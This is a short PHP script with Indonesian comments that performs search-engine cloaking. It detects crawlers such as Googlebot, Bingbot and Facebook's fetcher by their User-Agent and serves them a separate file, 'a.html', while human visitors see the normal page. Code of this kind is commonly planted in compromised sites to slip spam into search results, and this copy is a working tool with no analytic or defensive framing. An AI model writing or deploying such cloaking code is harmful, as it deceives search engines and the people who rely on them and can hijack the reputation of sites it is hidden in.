<?php
 $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
// Tambahin 'googlebot' di sini biar mutlak
 $target_bots = array('googlebot', 'google', 'adsbot-google', 'mediapartners-google', 'slurp', 'bingbot', 'duckduckbot', 'facebookexternalhit');

 $is_bot = false;


foreach ($target_bots as $bot) {
    
    if (strpos($user_agent, $bot) !== false) {
        $is_bot = true;
        break; 
    }
}


if ($is_bot) {
    
    if (file_exists('a.html')) {
        header('Content-Type: text/html'); 
        readfile('a.html');
    } else {
        echo "FILE a.html GAK ADA!";
    }
    exit; 
}


?>
